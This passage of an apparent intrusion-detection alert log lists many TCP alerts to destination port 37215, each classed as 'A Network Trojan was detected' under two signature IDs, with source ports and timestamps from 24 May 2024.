              SID:2835222
              Source Port:56600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369064
              SID:2835222
              Source Port:43242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202871
              SID:2829579
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455945
              SID:2835222
              Source Port:45152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568744
              SID:2835222
              Source Port:42036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535477
              SID:2835222
              Source Port:48754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398267
              SID:2835222
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873894
              SID:2829579
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096795
              SID:2835222
              Source Port:34030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121988
              SID:2829579
              Source Port:56282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482936
              SID:2835222
              Source Port:36688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445833
              SID:2829579
              Source Port:49500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113696
              SID:2835222
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045145
              SID:2835222
              Source Port:57380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883683
              SID:2829579
              Source Port:43698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404319
              SID:2835222
              Source Port:48974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536392
              SID:2829579
              Source Port:56552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432588
              SID:2829579
              Source Port:50696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568696
              SID:2835222
              Source Port:57806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547884
              SID:2829579
              Source Port:39234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098081
              SID:2835222
              Source Port:48896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448263
              SID:2829579
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246337
              SID:2835222
              Source Port:43558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076296
              SID:2829579
              Source Port:43270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152559
              SID:2829579
              Source Port:39826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519142
              SID:2835222
              Source Port:34180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346852
              SID:2829579
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041042
              SID:2829579
              Source Port:44690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168673
              SID:2835222
              Source Port:37328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492296
              SID:2829579
              Source Port:58882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814745
              SID:2835222
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060111
              SID:2835222
              Source Port:41852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681344
              SID:2829579
              Source Port:49762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771725
              SID:2829579
              Source Port:52660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054426
              SID:2835222
              Source Port:49710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150657
              SID:2829579
              Source Port:36122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279896
              SID:2829579
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871975
              SID:2835222
              Source Port:42484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725535
              SID:2835222
              Source Port:35250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188103
              SID:2835222
              Source Port:34768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345431
              SID:2835222
              Source Port:52942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625190
              SID:2835222
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481320
              SID:2829579
              Source Port:55290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420392
              SID:2835222
              Source Port:59500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340670
              SID:2835222
              Source Port:39254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690302
              SID:2835222
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099806
              SID:2829579
              Source Port:33870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535775
              SID:2829579
              Source Port:53584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622014
              SID:2829579
              Source Port:41072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100771
              SID:2829579
              Source Port:44898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724619
              SID:2829579
              Source Port:59770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573389
              SID:2835222
              Source Port:35482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433730
              SID:2835222
              Source Port:41232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698420
              SID:2835222
              Source Port:43804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880363
              SID:2829579
              Source Port:59764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482591
              SID:2835222
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591900
              SID:2835222
              Source Port:49222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.317948
              SID:2829579
              Source Port:44370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115328
              SID:2835222
              Source Port:48538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161635
              SID:2835222
              Source Port:49646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535501
              SID:2835222
              Source Port:41410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394657
              SID:2835222
              Source Port:57410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973872
              SID:2835222
              Source Port:53766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880852
              SID:2829579
              Source Port:34322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059762
              SID:2835222
              Source Port:43194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631287
              SID:2829579
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100462
              SID:2835222
              Source Port:33440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100540
              SID:2829579
              Source Port:56630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400623
              SID:2835222
              Source Port:59054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313295
              SID:2829579
              Source Port:45168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057371
              SID:2829579
              Source Port:44808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446337
              SID:2835222
              Source Port:52008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574457
              SID:2835222
              Source Port:58022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481402
              SID:2835222
              Source Port:48170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575420
              SID:2829579
              Source Port:47018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459501
              SID:2829579
              Source Port:58722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249140
              SID:2835222
              Source Port:43922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340552
              SID:2829579
              Source Port:39618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371999
              SID:2835222
              Source Port:50564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377467
              SID:2829579
              Source Port:49614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881658
              SID:2835222
              Source Port:44956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833265
              SID:2829579
              Source Port:41362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441364
              SID:2835222
              Source Port:34542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480399
              SID:2829579
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525302
              SID:2829579
              Source Port:47854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153266
              SID:2835222
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640312
              SID:2835222
              Source Port:60380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233582
              SID:2835222
              Source Port:59746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603693
              SID:2835222
              Source Port:53112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362261
              SID:2835222
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396257
              SID:2829579
              Source Port:48228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270641
              SID:2829579
              Source Port:34126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395136
              SID:2829579
              Source Port:36596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503277
              SID:2829579
              Source Port:57566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059533
              SID:2835222
              Source Port:56232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859981
              SID:2835222
              Source Port:60608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101433
              SID:2835222
              Source Port:43092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602568
              SID:2835222
              Source Port:46370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098867
              SID:2835222
              Source Port:54296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300377
              SID:2829579
              Source Port:48552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606874
              SID:2835222
              Source Port:48096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281604
              SID:2835222
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334175
              SID:2835222
              Source Port:39192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460443
              SID:2829579
              Source Port:59932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967851
              SID:2829579
              Source Port:50068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885930
              SID:2835222
              Source Port:49606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235741
              SID:2835222
              Source Port:33384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700959
              SID:2835222
              Source Port:59584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831624
              SID:2835222
              Source Port:32886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545008
              SID:2835222
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690223
              SID:2829579
              Source Port:56708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099496
              SID:2835222
              Source Port:55928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445848
              SID:2829579
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.834364
              SID:2835222
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705929
              SID:2835222
              Source Port:55138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575069
              SID:2829579
              Source Port:57836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111497
              SID:2829579
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455131
              SID:2829579
              Source Port:56618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234132
              SID:2829579
              Source Port:39412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572578
              SID:2829579
              Source Port:51650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592052
              SID:2829579
              Source Port:48534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101380
              SID:2829579
              Source Port:42842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446674
              SID:2835222
              Source Port:53998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245852
              SID:2829579
              Source Port:38482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060145
              SID:2835222
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462887
              SID:2835222
              Source Port:53376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458375
              SID:2829579
              Source Port:34574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.317987
              SID:2835222
              Source Port:47196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991096
              SID:2835222
              Source Port:50208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264778
              SID:2835222
              Source Port:36042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802170
              SID:2829579
              Source Port:36174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535281
              SID:2829579
              Source Port:46684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493500
              SID:2829579
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505705
              SID:2835222
              Source Port:48940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724734
              SID:2829579
              Source Port:53450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188828
              SID:2829579
              Source Port:47472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057453
              SID:2835222
              Source Port:38914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814653
              SID:2835222
              Source Port:33264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076885
              SID:2835222
              Source Port:44550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803136
              SID:2829579
              Source Port:46026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517941
              SID:2835222
              Source Port:41718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535923
              SID:2829579
              Source Port:48626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165578
              SID:2835222
              Source Port:60642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764402
              SID:2835222
              Source Port:45782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621761
              SID:2835222
              Source Port:53784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151238
              SID:2829579
              Source Port:53766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429681
              SID:2835222
              Source Port:41586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431579
              SID:2835222
              Source Port:37204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045381
              SID:2835222
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979736
              SID:2829579
              Source Port:58024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859816
              SID:2835222
              Source Port:40832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761812
              SID:2829579
              Source Port:45784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451132
              SID:2829579
              Source Port:38786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164008
              SID:2829579
              Source Port:46816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078742
              SID:2835222
              Source Port:58048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661950
              SID:2835222
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108830
              SID:2829579
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097380
              SID:2835222
              Source Port:43676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300345
              SID:2835222
              Source Port:53092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186571
              SID:2829579
              Source Port:44236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538251
              SID:2829579
              Source Port:55800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878806
              SID:2835222
              Source Port:51296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061765
              SID:2829579
              Source Port:51238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341151
              SID:2829579
              Source Port:49982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574820
              SID:2829579
              Source Port:54388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097801
              SID:2829579
              Source Port:48508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482955
              SID:2829579
              Source Port:52458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578719
              SID:2835222
              Source Port:34080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766297
              SID:2835222
              Source Port:46332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574565
              SID:2835222
              Source Port:42728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151134
              SID:2829579
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390674
              SID:2829579
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455238
              SID:2835222
              Source Port:35734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804738
              SID:2835222
              Source Port:43800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454547
              SID:2835222
              Source Port:49622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493067
              SID:2829579
              Source Port:36760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493551
              SID:2829579
              Source Port:57940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055726
              SID:2829579
              Source Port:41510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111325
              SID:2835222
              Source Port:54558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797686
              SID:2829579
              Source Port:46672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102914
              SID:2835222
              Source Port:38296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193911
              SID:2829579
              Source Port:56448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518910
              SID:2835222
              Source Port:35756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186443
              SID:2835222
              Source Port:60012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536647
              SID:2829579
              Source Port:45934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663483
              SID:2835222
              Source Port:35900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797810
              SID:2829579
              Source Port:35194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462967
              SID:2835222
              Source Port:49544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113478
              SID:2829579
              Source Port:45836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100718
              SID:2835222
              Source Port:37904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253609
              SID:2829579
              Source Port:52202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113266
              SID:2829579
              Source Port:35488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575171
              SID:2829579
              Source Port:55188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858398
              SID:2835222
              Source Port:49866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548631
              SID:2835222
              Source Port:40878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544207
              SID:2835222
              Source Port:57372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426494
              SID:2829579
              Source Port:38978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519000
              SID:2835222
              Source Port:60878
              Destination Port:37215
